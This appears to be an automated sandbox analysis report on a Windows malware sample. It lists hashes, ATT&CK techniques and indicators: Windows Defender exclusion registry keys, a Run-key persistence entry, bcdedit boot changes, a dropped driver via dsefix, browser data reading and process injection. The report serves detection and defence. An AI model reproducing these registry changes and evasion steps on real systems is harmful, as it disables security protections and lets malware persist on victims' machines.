b7db5b70b15ebac71e0aa8d7cb4e5f663171721b03157644cc2880a38337048a

Analysis

max time kernel
150s
max time network
150s
platform
windows10_x64
resource
win10v20201028
submitted
09-11-2020 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Size

3.9MB
MD5

460e041ccff9d5cf560b87a71ca3aabd
SHA1

07065b8143d074ec62453d560a80644d70301ac6
SHA256

b7db5b70b15ebac71e0aa8d7cb4e5f663171721b03157644cc2880a38337048a
SHA512

d9eda0b44c603b565f6a34c7394a869ae3097f7ce281ca0f76a59f8ebfaed41768b200300e49edc663737cece5f84769ffecb185fac13f5d34fd3267546f3cdb

Score

10^/10

discovery evasion persistence spyware trojan upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 668 created 912	668	svchost.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
PID 668 created 3188	668	svchost.exe	csrss.exe
PID 668 created 3188	668	svchost.exe	csrss.exe
PID 668 created 3188	668	svchost.exe	csrss.exe
PID 668 created 696	668	svchost.exe	csrss.exe
PID 668 created 696	668	svchost.exe	csrss.exe
PID 668 created 696	668	svchost.exe	csrss.exe
PID 668 created 696	668	svchost.exe	csrss.exe
PID 668 created 2252	668	svchost.exe	u20200626.exe
PID 668 created 1056	668	svchost.exe	collectchromefingerprint.exe

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 17 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
984	bcdedit.exe
3628	bcdedit.exe
2172	bcdedit.exe
2540	bcdedit.exe
1076	bcdedit.exe
1432	bcdedit.exe
200	bcdedit.exe
1032	bcdedit.exe
2612	bcdedit.exe
2252	bcdedit.exe
3864	bcdedit.exe
2716	bcdedit.exe
4036	bcdedit.exe
628	bcdedit.exe
204	bcdedit.exe
1360	bcdedit.exe
2660	bcdedit.exe

Drops file in Drivers directory 2 IoCs

Processes:

dsefix.execsrss.exe

description ioc process

File created C:\Windows\system32\drivers\VBoxDrv.sys dsefix.exe
File created C:\Windows\System32\drivers\Winmon.sys csrss.exe

description	ioc	process
File created	C:\Windows\system32\drivers\VBoxDrv.sys	dsefix.exe
File created	C:\Windows\System32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 17 IoCs

Processes:

csrss.exepatch.exedsefix.exeapp.execsrss.exepatch.exewindefender.exewindefender.exeww24.exeu20200626.execollectchromefingerprint.exeml-021120.exeaaa.exeu20200626.execollectchromefingerprint.exennn5.exenl.exe

pid	process
3188	csrss.exe
2092	patch.exe
1056	dsefix.exe
3412	app.exe
696	csrss.exe
1348	patch.exe
2712	windefender.exe
2196	windefender.exe
2880	ww24.exe
2252	u20200626.exe
1056	collectchromefingerprint.exe
392	ml-021120.exe
2056	aaa.exe
3624	u20200626.exe
1100	collectchromefingerprint.exe
1840	nnn5.exe
3644	nl.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
C:\Windows\windefender.exe	upx
behavioral2/memory/2712-67-0x0000000000400000-0x0000000000897000-memory.dmp	upx
C:\Windows\windefender.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe	upx
behavioral2/memory/1056-88-0x0000000000400000-0x00000000005E6000-memory.dmp	upx
behavioral2/memory/2252-85-0x0000000000400000-0x0000000000C1B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\collectchromefingerprint.exe	upx
behavioral2/memory/3624-104-0x0000000000400000-0x0000000000C1B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\aaa.exe	upx
behavioral2/memory/2056-107-0x0000000000400000-0x0000000000862000-memory.dmp	upx

Loads dropped DLL 4 IoCs

Processes:

patch.exe

pid process

2092 patch.exe
2092 patch.exe
2092 patch.exe
2092 patch.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2092	patch.exe
2092	patch.exe
2092	patch.exe
2092	patch.exe

Windows security modification 2 TTPs 13 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

SecuriteInfo.com.Mal.Generic-S.930.4597.execsrss.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57f67627e14e.exe = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\57f67627e14e = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\SecuriteInfo.com.Mal.Generic-S.930.4597.exe = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\57f67627e14e\57f67627e14e = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\BoldTree = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	SecuriteInfo.com.Mal.Generic-S.930.4597.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

SecuriteInfo.com.Mal.Generic-S.930.4597.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\BoldTree = "\"C:\\Windows\\rss\\csrss.exe\""	SecuriteInfo.com.Mal.Generic-S.930.4597.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

JavaScript code in executable 8 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\ww24.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\ml-021120.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\nnn5.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe	js
C:\Users\Admin\AppData\Local\Temp\csrss\nl.exe	js

Drops file in Windows directory 5 IoCs

Processes:

SecuriteInfo.com.Mal.Generic-S.930.4597.exeapp.execsrss.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
File opened for modification	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	SecuriteInfo.com.Mal.Generic-S.930.4597.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
216	912	WerFault.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
3796	816	WerFault.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
2176	3188	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2056 schtasks.exe
1992 schtasks.exe
3156 schtasks.exe
1352 schtasks.exe

pid	process
2056	schtasks.exe
1992	schtasks.exe
3156	schtasks.exe
1352	schtasks.exe

GoLang User-Agent 5 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	30	Go-http-client/1.1
HTTP User-Agent header	37	Go-http-client/1.1
HTTP User-Agent header	39	Go-http-client/1.1
HTTP User-Agent header	41	Go-http-client/1.1
HTTP User-Agent header	42	Go-http-client/1.1

Modifies data under HKEY_USERS 566 IoCs

Processes:

csrss.exewindefender.exeapp.execsrss.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	csrss.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time"	windefender.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

SecuriteInfo.com.Mal.Generic-S.930.4597.exeSecuriteInfo.com.Mal.Generic-S.930.4597.execsrss.exeapp.execsrss.exechrome.exechrome.exe

pid	process
912	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
912	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
3188	csrss.exe
3188	csrss.exe
3188	csrss.exe
3188	csrss.exe
3412	app.exe
3412	app.exe
3412	app.exe
3412	app.exe
696	csrss.exe
696	csrss.exe
696	csrss.exe
696	csrss.exe
696	csrss.exe
696	csrss.exe
4292	chrome.exe
4292	chrome.exe
4120	chrome.exe
4120	chrome.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

636
636

pid	process
636
636

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

SecuriteInfo.com.Mal.Generic-S.930.4597.exesvchost.execsrss.execsrss.exesc.exe

description	pid	process
Token: SeDebugPrivilege	912	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Token: SeImpersonatePrivilege	912	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
Token: SeTcbPrivilege	668	svchost.exe
Token: SeTcbPrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeSystemEnvironmentPrivilege	3188	csrss.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeSystemEnvironmentPrivilege	696	csrss.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeSecurityPrivilege	3444	sc.exe
Token: SeSecurityPrivilege	3444	sc.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe
Token: SeBackupPrivilege	668	svchost.exe
Token: SeRestorePrivilege	668	svchost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

chrome.exe

pid process

4120 chrome.exe
4120 chrome.exe
4120 chrome.exe

pid	process
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe

Suspicious use of WriteProcessMemory 537 IoCs

Processes:

svchost.exeSecuriteInfo.com.Mal.Generic-S.930.4597.execmd.execmd.exepatch.execsrss.exeapp.execsrss.exe

description	pid	process	target process
PID 668 wrote to memory of 816	668	svchost.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
PID 668 wrote to memory of 816	668	svchost.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
PID 668 wrote to memory of 816	668	svchost.exe	SecuriteInfo.com.Mal.Generic-S.930.4597.exe
PID 816 wrote to memory of 3580	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	cmd.exe
PID 816 wrote to memory of 3580	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	cmd.exe
PID 3580 wrote to memory of 1440	3580	cmd.exe	netsh.exe
PID 3580 wrote to memory of 1440	3580	cmd.exe	netsh.exe
PID 816 wrote to memory of 3628	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	cmd.exe
PID 816 wrote to memory of 3628	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	cmd.exe
PID 3628 wrote to memory of 1896	3628	cmd.exe	netsh.exe
PID 3628 wrote to memory of 1896	3628	cmd.exe	netsh.exe
PID 816 wrote to memory of 3188	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	csrss.exe
PID 816 wrote to memory of 3188	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	csrss.exe
PID 816 wrote to memory of 3188	816	SecuriteInfo.com.Mal.Generic-S.930.4597.exe	csrss.exe
PID 668 wrote to memory of 2056	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 2056	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 1992	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 1992	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 2092	668	svchost.exe	patch.exe
PID 668 wrote to memory of 2092	668	svchost.exe	patch.exe
PID 2092 wrote to memory of 984	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 984	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 3628	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 3628	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2172	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2172	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2540	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2540	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1076	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1076	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1432	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1432	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 200	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 200	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1032	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 1032	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2612	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2612	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2252	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2252	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 3864	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 3864	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2716	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 2716	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 4036	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 4036	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 628	2092	patch.exe	bcdedit.exe
PID 2092 wrote to memory of 628	2092	patch.exe	bcdedit.exe
PID 3188 wrote to memory of 204	3188	csrss.exe	bcdedit.exe
PID 3188 wrote to memory of 204	3188	csrss.exe	bcdedit.exe
PID 3188 wrote to memory of 1056	3188	csrss.exe	dsefix.exe
PID 3188 wrote to memory of 1056	3188	csrss.exe	dsefix.exe
PID 3188 wrote to memory of 3412	3188	csrss.exe	app.exe
PID 3188 wrote to memory of 3412	3188	csrss.exe	app.exe
PID 3188 wrote to memory of 3412	3188	csrss.exe	app.exe
PID 3412 wrote to memory of 696	3412	app.exe	csrss.exe
PID 3412 wrote to memory of 696	3412	app.exe	csrss.exe
PID 3412 wrote to memory of 696	3412	app.exe	csrss.exe
PID 668 wrote to memory of 3156	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 3156	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 1352	668	svchost.exe	schtasks.exe
PID 668 wrote to memory of 1352	668	svchost.exe	schtasks.exe
PID 696 wrote to memory of 1360	696	csrss.exe	bcdedit.exe
PID 696 wrote to memory of 1360	696	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Mal.Generic-S.930.4597.exe
